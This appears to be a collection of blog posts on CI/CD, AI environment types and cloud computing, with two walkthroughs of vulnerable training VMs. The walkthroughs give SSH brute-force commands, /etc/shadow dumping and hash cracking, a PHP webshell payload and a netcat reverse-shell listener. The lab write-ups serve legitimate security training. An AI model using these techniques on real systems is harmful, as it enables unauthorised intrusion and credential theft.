CD: Continuous Delivery

Nowadays, our development teams use Agile methodologies, which means that we have had to accelerate our processes, trying to deliver small chunks of functionality to receive early, real feedback from users and keep iterating on our ideas.

Now, we are an organization that follows Continuous Integration practices, but we are still missing something. We are not able to receive this feedback if ages pass between our developers finishing their tasks and the code being deployed to production, where our users can use it. In addition, when a lot of changes or features are delivered at the same time, it becomes more difficult to debug and solve possible errors. For a long time, the deployment process has been seen as a risky process that requires a lot of preparation, but this needs to change if we want to be truly Agile.

This is where Continuous Delivery (CD) comes in. Continuous Delivery is a practice that tries to make tracking and deploying software trivial. The goal is to ship changes to our users early and often, multiple times a day if possible, to minimize the risk of releasing and to give our developers the opportunity to get feedback as soon as possible.

As I have said before, we should already have a Continuous Integration environment to ensure that all changes pushed to the main repository are tested and ready to be deployed. Can it be done without a CI environment? Yes, probably, but more probably we are just going to build a machine that pushes our bugs to production faster, increasing our risk.

Steps we need to take

Create a continuous delivery pipeline

The continuous delivery pipeline is the list of steps that happen every time our code changes, until it finds its way to production. It includes building and testing the application as part of the CI process and extends it with the ability to deploy to, and test, staging and production environments; a minimal sketch follows the list below.

With this we will achieve two things:

  • Our code will always be ready to be deployed to production.
  • Releasing changes will be as simple as clicking a button.
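
Just to make it concrete, here is a minimal sketch of these steps expressed as a shell script; every command (“make build”, “./deploy.sh”, …) is a placeholder and not a prescription for any particular tool:

#!/bin/bash
# Minimal sketch of a delivery pipeline; each stage is a placeholder
# command standing in for your real build/test/deploy tooling.
set -e                 # stop the pipeline at the first failing stage

make build             # CI: compile and package the application
make test              # CI: run unit and integration tests
./deploy.sh staging    # CD extension: release the candidate to staging
make acceptance-test   # CD extension: acceptance tests against staging
# The production release stays behind a manual trigger ("the button").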

Create a staging environment

All of us, generally, have written code at some point in our lives; some of us still do it, some of us have evolved in our careers. But something I am sure all of us remember are those cases of “it worked on my machine…”. Configurations, differences in environments, networks… There are thousands of things that can be different and can go wrong, and they probably will. No matter how many tests we have locally, or how many precautions we take, our local conditions are not going to be the same as our production conditions. For this reason we need an intermediate environment, the “staging” environment.

The “staging” environment does not need to support the same scale as our production environment but it should be as close as possible to the production configuration to ensure that the software is tested in similar conditions.

The “staging” environment should allow us to see things before they happen. If something is going to break, it should break in this environment. Using this environment, our release workflow should look similar to this:

  1. Developers build and test a feature locally.
  2. Developers push their changes to the main repository where CI tests run automatically against their commits.
  3. If the build is green, the changes are released to the staging environment.
  4. Acceptance tests are run against the staging environment to make sure nothing is broken.
  5. Changes are now ready to be deployed to production.

An additional advantage is that it allows our QA team and product owners to verify that the software works as intended before releasing to our users, without requiring a special deployment or access to a local developer machine.

Automate our deployment

In other words, we need to create a “green button” that, once pressed, deploys our code to staging or production without any other human intervention.

We can start by writing some scripts that we run from our development machines and, after that, add them to any CI platform.

There are many ways to deploy software, but there are common rules that we can use as guidance; a sketch applying some of them follows the list:

  • Version the deployment scripts with our code. That way we will be able to audit changes to our deployment configuration easily if necessary.
  • Do not store passwords in our script. Instead, use environment variables that can be set before launching the deployment script.
  • Use SSH keys when possible to access the deployment servers. They will allow us to connect to our servers without providing a password and will resist brute-force attacks.
  • Make sure that any build tools involved in the pipeline do not prompt for user input. Use a non-interactive mode or provide an option to automatically assume “yes” when installing dependencies.
  • Test it, test it and test it again. Make sure everything deploys as expected and that nothing is missing, no matter what kind of changes you are making.
  • This may also be a good moment to write some smoke tests, if you do not have them, to check that your machines are up and running.
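
Putting several of these rules together, a deployment script could look like the sketch below; the host, key, package and service names are invented for illustration:

#!/bin/bash
# Hypothetical deployment script applying the rules above: versioned with
# the code, no stored passwords, SSH keys, non-interactive tools.
set -e

: "${APP_SECRET:?Set APP_SECRET before launching the deployment}"  # secrets come from the environment

HOST="deploy@staging.example.com"   # illustrative host
KEY="$HOME/.ssh/deploy_key"         # SSH key instead of a password

scp -i "$KEY" app.tar.gz "$HOST:/opt/app/releases/"
ssh -i "$KEY" "$HOST" "
  tar xzf /opt/app/releases/app.tar.gz -C /opt/app/current &&
  sudo DEBIAN_FRONTEND=noninteractive apt-get install -y libfoo &&
  sudo systemctl restart app
"
curl --fail --silent https://staging.example.com/health  # smoke test: up and running?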

Include data structure changes

Let’s face it: when our application changes, the code is not the only thing changing. The data structures change too. And we are not going to have a real CD environment if these changes are not added to our automated deployments.

First, create backups. No matter how good we are or how small the change is, something is going to fail at some point, and we want to be able to restore the previous state of the application.

Second, there are multiple tools that can help us manage data structure changes as code. Some frameworks bring their own to the table; if not, we can find tools that fit our technologies and ideas. Just learn them and use them.
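
As a sketch of how this step could slot into the deployment, assuming a MySQL database and a generic “./migrate” command standing in for whatever tool your stack provides (Flyway, Liquibase, framework migrations, …):

#!/bin/bash
# Data-structure step of a deployment: back up first, then apply the
# versioned migrations that live in the repository with the code.
set -e

mysqldump --single-transaction app_db > "backup-$(date +%F-%H%M).sql"  # restore point
./migrate up   # placeholder for your migration tool of choice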

All together, and the last detail: the CI server

Arriving here, we have set up a CI environment with a CI server and we have a “button” to run our deployments. Now, why not put everything together?

To do this, we just need to add a manual step in our pipeline to release (press the button) the code to our different environments.

Now, every time our code is merged and ready for production, following business needs, we just need to push the button and release. This gives us great control over our deployments. The only precaution we need to take is not to let too many commits accumulate.

Walkthrough: De-ICE: S1.100


The purpose of this article is to describe, for educational purposes (see disclaimer), the pentesting of a vulnerable image created for training purposes called “De-ICE: S1.100”.



The scenario for this LiveCD is that the CEO of a small company has been pressured by the Board of Directors to have a penetration test done within the company. The CEO, believing his company is secure, feels this is a huge waste of money, especially since he already has a company scan their network for vulnerabilities (using Nessus). To make the BoD happy, he decides to hire you for a 5-day job; and because he really doesn’t believe the company is insecure, he has contracted you to look at only one server – an old system that only has a web-based list of the company’s contact information.

The CEO expects you to prove that the admins of the box follow all proper accepted security practices, and that you will not be able to obtain access to the box. Prove to him that a full penetration test of their entire corporation would be the best way to ensure his company is actually following best security practices.


PenTest Lab Disk 1.100: This LiveCD is configured with an IP address of – no additional configuration is necessary.


ISO image

I am going to skip the configuration process because it is trivial and it is not the purpose of this article.

All the tools used for this article are, or can be, installed in a Kali Linux distribution.

Once we have both machines running, our Kali Linux and the training image, the first step should be checking that they are in the same network and that we can see the training machine from the testing machine. We can use the “ping” command (which in this case is going to fail) or the “netdiscover” command, just to list a couple of options. In my case, I have used “netdiscover”:

netdiscover -i eth1 -r
Figure 1. Netdiscover execution result

Once we are sure we can reach the training machine, the first step is to take a look around, checking the web page that is available. We can see a brief explanation of the challenge and not much more than that. But we can see one very important thing here: reading the page carefully, we can see there are some emails related to the company.

Head of HR: Marie Mary - (On Emergency Leave) 
Employee Pay: Pat Patrick -
Travel Comp: Terry Thompson -
Benefits: Ben Benedict -
Director of Engineering: Erin Gennieg -
Project Manager: Paul Michael -
Engineer Lead: Ester Long -
Sr. System Admin: Adam Adams -
System Admin (Intern): Bob Banter -
System Admin: Chad Coffee -

We should pay special attention to the last three because they are admin users.

This gives us several pieces of information:

  • Names of people working in the company.
  • Valid emails.
  • Examples of how they are creating usernames.

It is time to start exploring what the training system is offering. For this purpose, I am going to use “nmap”.

nmap -p 1-65535 -T4 -A -v
Figure 2. nmap results

As we can see, there are a few ports open on the training machine:

  • 21: FTP service. And, something is not right here.
  • 22: SSH service
  • 25: SMTP service
  • 80: HTTP service
  • 110: POP3 service
  • 143: IMAP service

Considering we do not have any other information, we need to start thinking about what we are missing. We already have some valid emails, and with this information we can create a list of possible users in the system. In addition, we can add users like “root” or “admin” or similar users that are always useful to have. In this case, our list can be something like the following (a small script to generate it appears after the list):

aadams adamsa adamsad adam.adams
bbanter banterb banterbo bob.banter
ccoffee coffeec coffeech
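
A small script to generate those candidates, assuming a hypothetical “names.txt” input file with one “first last” pair per line, could be:

#!/bin/bash
# Generate username candidates following the patterns observed above;
# "names.txt" is an assumed input file, one "first last" name per line.
while read -r first last; do
  echo "${first:0:1}${last}"   # aadams
  echo "${last}${first:0:1}"   # adamsa
  echo "${last}${first:0:2}"   # adamsad
  echo "${first}.${last}"      # adam.adams
done < names.txt > users.txt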

Now that we have a list of possible users, we can try to connect to the SSH service. For this, we are going to use the tool “medusa” to perform a dictionary attack and see if we are lucky.

medusa -h -U users.txt -P passwds.txt -M ssh -v 4 -w 0
Figure 3. medusa result

As we can see, we have been able to break one password. Let’s use it and try to connect using SSH.

ssh aadams@
Figure 4. SSH connection with aadams

As we can see, we are able to connect. Now that we are inside, let’s see what “sudo” commands we have available.

sudo -l
Figure 5. Available tools

We can see that we can use the tool “cat” to read file content. So, let’s check the files “/etc/passwd” and “/etc/shadow”.
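
For reference, the commands would presumably be along these lines:

sudo cat /etc/passwd
sudo cat /etc/shadow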

Figure 6. /etc/shadow content

With a simple copy and paste we can move the content of both files to our machine and try to use “John” to discover new passwords, especially the “root” password. After the copies are done, we can “unshadow” the files to have everything in one file.

unshadow passwd_file.txt shadow_file.txt > root_password.txt


Figure 7. unshadowing the passwd and shadow files

Trying to save a little bit of time, and because we already have a working user, “aadams”, we can copy the “root” credential to a separate file and try to break just the “root” password.

john just_root.txt
Figure 8. John results

Great! We have the “root” password. Now we can try to connect with SSH using the “root” credentials.

ssh root@
Figure 9. SSH connection as “root” failing

As we can see, we are not able to connect as the “root” user using SSH. But we still have the “root” password and a valid user, “aadams”. Let’s try to log in as “root” using our valid user.
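
That is, once connected as “aadams”, we can presumably just switch users:

su -   # provide the cracked "root" password when prompted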

Figure 10. We are root!

Usually, now that we are root, we could close the case and deliver our report; but going around a little bit we can find an interesting file and, considering this is a training exercise, we can play a bit more. The file is this one:

Figure 11. Curious file
Figure 12. Encrypted file, maybe
binwalk salary_dec2003.csv.enc
Figure 13. Confirming it is an encrypted file

What do we know about the file:

  • It is encrypted with OpenSSL.
  • It was in a folder only accessible by the “root” user. We can think that maybe it was encrypted using the “root” password we have.
  • We know that we do not know the type of cipher.

We can check the type of ciphers that OpenSSL offers.

openssl enc help
Figure 14. Available ciphers

Let’s try one of them, out of curiosity, to see what an error looks like and, after that, let’s figure out how to try all of them to find the correct one.

openssl enc -d -aes-128-cbc -in salary_dec2003.csv.enc -out salary_dec2003.csv -k tarot
Figure 15. Decrypting the file

I guess it is because this is just a training environment, but the one that does the job is the first one we try; no more attempts are needed. In the real world, we would probably write a script to test all the available ciphers.

Figure 16. File decrypted
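
Such a script could look like the sketch below, assuming a reasonably modern OpenSSL where “openssl enc -ciphers” lists the supported ciphers; the file name and the password are the ones from this scenario:

#!/bin/bash
# Try every cipher OpenSSL knows about and report the ones that decrypt
# without an error; false positives are possible, so inspect the output.
for cipher in $(openssl enc -ciphers 2>&1 | grep -o -- '-[a-z0-9-]\+'); do
  if openssl enc -d "$cipher" -in salary_dec2003.csv.enc \
       -out "salary_dec2003$cipher.csv" -k tarot 2>/dev/null; then
    echo "possible cipher: $cipher"
  fi
done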

With this, our scenario finishes. We have access to the machine, we have root permissions and we have decrypted the “salary” file; our job is done. It has been interesting, but I think it was only possible because the passwords were not very strong.



Walkthrough: 21LTR: Scene 1

The purpose of this article is to describe, for educational purposes (see disclaimer), the pentesting of a vulnerable image created for training purposes called “21LTR: Scene 1”.


Scene 1

Your pentesting company has been hired to perform a test on a client company’s internal network. Your team has scanned the network and you have been assigned one of the discovered systems. Perform a test on this system starting from the beginning of your chosen methodology and submit your report to the project manager at scenes AT 21LTR DOT com

Scope Statement

The client has defined a set of limitations for the pentest:

  • All tests will be restricted to the systems identified on the network.
  • All commands run against the network and systems must be supplied in the form of script files packaged with the submission of the report.
  • A final report indicating all identified vulnerabilities and exploits will be provided to the company’s engineering department within 90 days of the start of this engagement.


Scenario Pentest Lab Scene 1:

This LiveCD is configured with an IP address of – no additional configuration is necessary.


ISO image

Torrent file (Magnet)

I am going to skip the configuration process because it is trivial and it is not the purpose of this article.

All the tools used for this article are, or can be, installed in a Kali Linux distribution.

Once we have both machines running, our Kali Linux and the training image, the first step should be checking that they are in the same network and that we can see the training machine from the testing machine. We can use the “ping” command or the “netdiscover” command, just to list a couple of options. In my case, I have used “netdiscover”:

netdiscover -i eth1 -r
Figure 1. Netdiscover execution result

Once we are sure we can reach the training machine, the first step is to take a look around, checking the web page that is available. In this case the web page gives us little information and nothing interesting, but the source code of the page gives us the first good finding: in a comment in the page, we can find some credentials.

Figure 2. Credentials found in the source code

There is nothing else to do here but, to be sure we are not missing some pages or folders, let’s run a different tool against the web page to check it. The tool is going to be “dirb”.

Figure 3. dirb results

We can see that a couple of folders have been found, but the only one that seems to respond in the browser is “/logs”. Unfortunately, it returns a “Forbidden” error.

It is time to start exploring what the training system is offering. For this purpose, I am going to use “nmap”.

nmap -p 1-65535 -T4 -A -v
Figure 4. nmap results

As we can see, there are a few ports open on the training machine:

  • 21: FTP service
  • 22: SSH service
  • 80: HTTP service
  • 10001: At this point, I am not sure what this is. In addition, it does not always show up in the scan results.

Considering we have some credentials, let’s try to connect to the different services. There is no luck with the SSH access, but the FTP service allows us to connect and explore. Unfortunately, we can find just one file.

Figure 5. FTP exploration results

Considering we previously found a “/logs” folder and we have now found a file called “backup_log.php”, one good idea is to try the URL we can build with them.

Figure 6. Page content

It looks like some kind of backup log system, but it is not giving us enough information to do anything else.


At this point, I must admit that I was a bit lost and running out of ideas, so, while I went for a walk, I left “Wireshark” running. Why? Because both are good ideas: going for a walk when you are blocked, and leaving a sniffer on because you never know what you may find in the network. After taking a look at the traffic, I saw some (a lot of) calls asking for the IP address “”.

Figure 7. Wireshark results

At this point, I decided to change the IP of my testing machine to this address and turn “Wireshark” on again to see what happens and, indeed, I got one interesting event. Apparently, the training machine wants to establish a connection with “” (my machine now) on port 10000.

Figure 8. Wireshark results

Then, let’s allow this connection to see what happens. To allow it, let’s execute “netcat” and wait again.

nc -lvvp 10000 > output

Here we can see that the connection is made at some point and we get what looks like a binary file called “output”. After some investigation, we can see it is a “tar.gz” file (using exiftool). We cannot find anything interesting inside, but it is clear that it is a backup file.

Figure 9. Wireshark result
exiftool --list output
Figure 10. exiftool result
Figure 11. Exploring backup file

Linking the facts that the “nmap” scan shows a port 10001 we do not know anything about, that the server has a page showing backup result messages, and that we are obviously downloading a backup file, we can infer that maybe port 10001 only opens when the machine is waiting for a response about the sent backup. To test this theory, let’s try to connect to port 10001 when the backup is sent. Because we do not know when that is going to happen, let’s just try to connect multiple times.

while true; do nc -v 10001 && break; sleep 1; clear; done

After a few minutes, the connection is established and we can type a few instructions.

Figure 12. Wireshark results

Apparently, they do nothing but, when we go back to the backup log messages page, we can see what we have been typing.

Figure 13. Messages typed

Then, let’s try to type something that allows us to do something useful and gives us access to the training machine. Let’s try to inject a PHP one-line webshell:

<?php echo exec($_GET["cmd"]);?>

And type something to check if it is working.

curl --silent
Figure 14. Connection result

As we can see (at the end of the image), we are connected to the training machine as “apache”. Now, let’s try to get a proper shell where we can execute commands and take a proper look at the system. We are going to listen on a port on our system and try to connect to it with a shell process from the training machine.

nc -lvvp 443
curl --silent #

And, success, we have our shell.

Figure 15. Shell in the training machine

The next step is to try to find the credential files and see their content but, unfortunately, we can just list the file “/etc/passwd”; the credentials are (I guess) in “/etc/shadow”, which we cannot list.

Our next step is looking around the machine to see what we can find. In this case, after some exploration, we can find a folder “/media/USB_1/Stuff/Keys” with two very interesting files:

  • authorized_keys: with the keys of the users authorized to connect over SSH. In this case, “hbeale”.
  • id_rsa: the private key to connect over SSH.
Figure 16. User with SSH access
Figure 17. Private key

Copying the key to our system, we can try to connect.
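
One detail worth remembering: ssh refuses private keys with loose permissions, so after copying the key we may need something like:

chmod 600 id_rsa   # ssh ignores private keys readable by other users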

ssh hbeale@
Figure 18. SSH access

Let’s check what commands we can execute with “sudo”. We can see that we can use the tool “cat” to read file content.

sudo -l
Figure 19. Available tools

Then, let’s check the file “/etc/shadow” again.
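
Again, presumably something like:

sudo cat /etc/shadow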

Figure 20. /etc/shadow content

Here we can see the hash for the “root” user, and we can copy it to a file on our system (root_password). Let’s try to increase our privileges by cracking the hash with “John” (the tool John the Ripper) and one of the dictionaries that come with Kali.

john --wordlist=rockyou.txt root_password
Figure 21. John’s execution

We are lucky: John has done its job properly and we have the password “formula1”. Let’s try it.

Figure 22. We are root!

With this, our scenario finishes. We have access to the machine and we have root permissions; our job is done. It has been fun and frustrating, but I do not think the first would have been possible without the second.


Artificial Intelligence: Types of environments

Let’s first describe what an agent is in artificial intelligence. An intelligent agent is an autonomous entity that observes through sensors, acts upon an environment using actuators, and directs its activity towards achieving goals. Intelligent agents may also learn or use knowledge to achieve their goals. They may be very simple or very complex.

When designing artificial intelligence solutions we need to consider aspects such as the characteristics of the data (labelled, unlabelled, …), the nature of the learning algorithms (supervised, unsupervised, …) and the nature of the environment in which the AI solution operates. We tend to spend large amounts of time on the first two aspects, but it turns out that the characteristics of the environment are one of the absolutely key elements in determining the right models for an AI solution. Understanding the characteristics of the environment is one of the first tasks we need to do. From this point of view we can consider several categories.

Fully vs Partially Observable

An environment is called fully observable if what your agent can sense at any point in time is completely sufficient to make an optimal decision. For example, imagine a card game where all the cards are on the table: the momentary sight of all those cards is really sufficient to make an optimal choice.

An environment is called partially observable if you need memory on the side of the agent to make the best possible decision. For example, in poker the cards are not openly on the table, and memorizing past moves will help you make a better decision.

Deterministic vs Stochastic

A deterministic environment is one where your agent’s actions uniquely determine the outcome. For example, in chess there is really no randomness when you move a piece; the effect of moving a piece is completely predetermined and, no matter how many times I make the same move, the outcome is the same.

In a stochastic environment there is a certain amount of randomness involved. Games that involve dice are stochastic: while you can still deterministically move your pieces, the outcome of an action also involves throwing the dice, and you cannot predict it.

Discrete vs Continuous

A discrete environment is one where you have finitely many action choices and finitely many things you can sense. For example, chess has finitely many board positions and finitely many things you can do.

A continuous environment is one where the space of possible actions or things you can sense may be infinite. In the game of darts, when throwing a dart we have infinitely many ways to angle it and accelerate it.

Benign vs Adversarial

In benign environments, the environment might be random, it might be stochastic, but it has no objective of its own that would contradict your own objective. Weather is benign: it might be random, it might affect the outcome of your actions, but it is not really out there to get you.

In adversarial environments, the opponent is really out to get you. In the game of chess, the environment has the goal of defeating you. Obviously, it is much harder to find good actions in adversarial environments, where the opponent actively observes you and counteracts what you are trying to achieve, than in benign environments.

I have seen a few more classifications or specializations but, more or less, all of them list the same categories or very similar ones.

Note: Article based on my notes of the course Intro to Artificial Intelligence | Udacity


CI: Continuous Integration

Continuous integration (CI) is a practice where team members integrate their code early and often into the main branch or code repository. The objective is to reduce the risk, and sometimes pain, generated when we wait until the end of the sprint or project to do it.

One of the biggest benefits of the CI practice is that it allows us to identify and address possible conflicts as soon as possible, with the obvious benefit of saving time during development. In addition, it reduces the amount of time spent in regression testing and fixing bugs because it encourages us to have a good set of tests. Plus, it gives us a better understanding of the features we are developing and of the codebase, due to the continuous integration of features into our codebase.

What do we need?

Tests, tests, tests… Automatic tests

To get the full benefits of CI, we will need to automate our tests so we are able to run them for every change that is made to the repository. And when I say repository, I mean every branch and not just the main branch. Every branch should run the tests and it should not be merged until they are green, all of them. This way, we will be able to capture issues early and minimise disruptions to our team.

Types of tests

There are many types of tests that can be implemented. We can start small and grow our coverage progressively. The more meaningful tests we have the better but, since we are running a project, we should find a balance between releasing features and increasing our coverage.

How many should I implement?

To decide about that, we just need to remember two things. The first one is that we want meaningful tests; we should not care about the number of tests, we should care about how useful they are. We should write enough tests to be confident that if we introduce a bug (technical or business) we are going to detect it. And second, we should take a look at “The Testing Pyramid”; here you can find a link to an article by Martin Fowler. Basically, it explains, from a cost-effectiveness point of view, the amount and type of tests we should write.

Running your tests automatically

One of the things we have discussed we need is to run our tests on every change that gets pushed. To do so, we will need a service that can monitor our repository and listen for new pushes to the codebase. There are multiple solutions, both on-premise and in the Cloud.
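
Just to make the idea concrete (a toy sketch, not a replacement for a real CI server), the core loop of such a service boils down to something like:

#!/bin/bash
# Toy CI loop, run from inside a clone of the repository: poll for new
# commits on main and run the test suite on each one; "make test" is a
# placeholder for your real suite.
while true; do
  git fetch origin
  if [ "$(git rev-parse HEAD)" != "$(git rev-parse origin/main)" ]; then
    git reset --hard origin/main
    if make test; then echo "build green"; else echo "build red: alert the team"; fi
  fi
  sleep 60
done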

There are a few considerations we need to think about when evaluating such a solution: platform, resources, access to our repositories, … Some examples are Travis CI, Bamboo or Jenkins.

Immersion in CI

This is not just a technical change; we need to keep in mind, when trying to adopt CI, that it is a cultural change too.

We need to start integrating code more often, creating shorter stories or breaking them into short deliverables; we always need to keep the build green; we need to add tests in every story; we can even use refactoring tasks to add tests and increase our code coverage. We should write tests when we fix bugs, and so on.

One group of your team that is going to be affected directly by this change is the QA group. They no longer need to manually test trivial capabilities of our application, and they can now dedicate more time to providing tools to support developers as well as helping them adopt the right testing strategies. Our QA engineers will be able to focus on facilitating testing with better tooling and datasets, as well as helping developers grow in their ability to write better code. They will still need to manually test some complex scenarios, but it will not be their main task anymore.

Quick summary

Just as a quick summary of the roadmap to adopt CI, we can list the following points:

  1. Start writing tests for the critical parts of your system.
  2. Get a CI system to run our tests after every push.
  3. Pay attention to the culture change. Help our team to understand it and to achieve it.
  4. Keep the build green.
  5. Write tests as part of every story, every bug and every refactor.
  6. Keep doing 3, 4 and 5.

At the beginning, cultural changes are scary and they feel impossible, but the rewards are sometimes worth the effort. A new project, if we have one, is maybe a good option to start changing our minds and taking a CI approach in the development life cycle. If we start with an existing project, start slow, step by step, but always moving forward. And we should always remember that this is not just a technological change, it is a cultural change too: explain, share and be patient.


CI, CD and CD

When we talk about modern development practices, we often hear some acronyms, among which we can find CI and CD, referring to the way we build and release software. CI is pretty straightforward and stands for continuous integration. But CD can mean either continuous delivery or continuous deployment. All these practices have things in common, but they also have some significant differences. We are going to explain these similarities and differences.

Continuous integration

In environments where continuous integration is used, developers merge their changes into the main branch as often as they can. These changes are validated by creating a build and running automated tests against it. Doing this, we avoid the painful releases of the old times, when everything was merged at the last minute.

The continuous integration practice puts a big emphasis on automated testing to keep the build healthy each time commits are merged into the main branch, warning quickly about possible problems.

Continuous delivery

Continuous delivery is the next step towards the release of your changes. This practice makes sure you can release to your customers as often and as quickly as you want. This means that, on top of having automated your testing, you have also automated your release process and you can deploy your application at any point in time by clicking a button.

With continuous delivery, you can decide to release daily, weekly, fortnightly, or whatever suits your business requirements. However, if you truly want to get the benefits of continuous delivery, you should deploy to production as soon as possible to make sure that you release small batches, that are easy to troubleshoot in case of problems.

Continuous deployment

But we can go another step further, and this step is continuous deployment. With this practice, every change that passes all stages of your production pipeline is released to your customers. There is no human intervention (no clicking a button to deploy), and only a failing test will prevent a new change from being deployed to production.

Continuous deployment is an excellent way to accelerate the feedback loop with your customers and take pressure off the team, as there is no ‘release day’ anymore. Developers can focus on building software, and they see their work go live minutes after they have finished working on it. Basically, when a developer merges a commit into the main branch, the branch is built, tested and, if everything goes well, deployed to the production environment.
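
A toy sketch of the only difference between the two CDs, expressed as the final stage of a pipeline script where every command is a stub standing in for the real stage:

#!/bin/bash
# Stubs standing in for the real pipeline stages.
build_and_test() { echo "build + automated tests"; }
deploy()         { echo "deploying to $1"; }

build_and_test
deploy staging
if [ "${AUTO_RELEASE:-no}" = "yes" ]; then
  deploy production        # continuous deployment: no human in the loop
else
  read -r -p "Release to production? (y/n) " answer   # continuous delivery: the button
  [ "$answer" = "y" ] && deploy production
fi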

Can I use all of them together?

Of course you can; as I have said, each one of them is just a step closer to the production environment. You can set up your continuous integration environment and, after that, once the team is comfortable, you can add continuous delivery and, finally, continuous deployment can be added to the picture.

Example of CI, CD and CD pipeline

Is it worth it?

Continuous integration

What it needs from you:

  • Your team will need to write automated tests for each new feature, improvement or bug fix.
  • You need a continuous integration server that can monitor the main repository and run the tests automatically for every new commit pushed.
  • Developers need to merge their changes as often as possible, at least once a day.

What it gives to you:

  • Fewer bugs get shipped to production as regressions are captured early by the automated tests.
  • Building the release is easy as all integration issues have been solved early.
  • Less context switching as developers are alerted as soon as they break the build and can work on fixing it before they move to another task.
  • Testing costs are reduced drastically – your CI server can run hundreds of tests in a matter of seconds.
  • Your QA team spends less time testing and can focus on significant improvements to the quality culture.

Continuous delivery

What it needs from you:

  • You need a strong foundation in continuous integration and your test suite needs to cover enough of your codebase.
  • Deployments need to be automated. The trigger is still manual but once a deployment is started there should not be a need for human intervention.
  • Your team will most likely need to embrace feature flags so that incomplete features do not affect customers in production.

What it gives to you:

  • The complexity of deploying software has been taken away. Your team does not have to spend days preparing for a release anymore.
  • You can release more often, thus accelerating the feedback loop with your customers.
  • There is much less pressure on decisions for small changes, hence encouraging iterating faster.

Continuous deployment

What it needs from you:

  • Your testing culture needs to be at its best. The quality of your test suite will determine the quality of your releases.
  • Your documentation process will need to keep up with the pace of deployments.
  • Feature flags become an inherent part of the process of releasing significant changes to make sure you can coordinate with other departments (Support, Marketing, PR…).

What it gives to you:

  • You can develop faster as there is no need to pause development for releases. Deployment pipelines are triggered automatically for every change.
  • Releases are less risky and easier to fix in case of problems as you deploy small batches of changes.
  • Customers see a continuous stream of improvements, and quality increases every day, instead of every month, quarter or year.

As said before, you can adopt continuous integration, continuous delivery and continuous deployment. How you do it depends on your needs and your situation. If you are just starting a project and you do not have customers yet, you can go for it and implement all three, iterating on them as you iterate on your project and your needs grow. If you already have a project in production, you can go step by step, adopting the practices first in your staging environments.


Advantages of Cloud Computing

Nowadays, it is clear that cloud computing has revolutionized how technology is obtained, used and managed. And all of this has changed how organizations budget and pay for technology services.

Cloud computing has given us the ability to quickly reconfigure our environments to adapt them to changing business requirements. We can run cost-effective services that scale up and down depending on usage or business demands and, all of this, with pay-per-use billing. This makes huge upfront infrastructure expenses unnecessary and levels the playing field between big enterprises and new ones.

There are multiple and diverse advantages, and most of them depend on the enterprise, the business and its needs. But there are six that tend to appear in every case:

Variable vs. Capital Expense

Instead of having to invest in data centers and servers before knowing how they are going to be used, you pay only when you consume computing resources, and only for how much you consume.

Economies of Scale

By using cloud computing, we can achieve a lower variable cost than we would get on our own. Cloud providers like AWS can aggregate hundreds of thousands of customers in the cloud, achieving higher economies of scale, which translates into lower prices.

Stop Guessing Capacity

When we make a capacity decision prior to deploying an application, we usually end up either sitting on expensive idle resources or dealing with limited capacity. With cloud computing there is no more need for guessing. The cloud allows us to access as much or as little capacity as we need to cover our business needs, and to scale up or down as required, without advanced planning and within minutes.

Increase Speed and Agility

Deploying new resources to cover new business cases, or implementing prototypes and POCs to experiment, can now be achieved with a few clicks: new resources are provisioned in a simple, easy and fast way, usually reducing costs and time and allowing companies to adapt and explore.

Focus on Business Differentiators

Cloud computing allows enterprises to focus on their business priorities, instead of on the heavy lifting of racking, stacking, and powering servers. This allows enterprises to focus on projects that differentiate their businesses.

Go Global in Minutes

With cloud computing, enterprises can easily deploy their applications to multiple locations around the world, providing redundancy and lower latencies. This is not reserved for the largest enterprises anymore; cloud computing has democratized this ability.
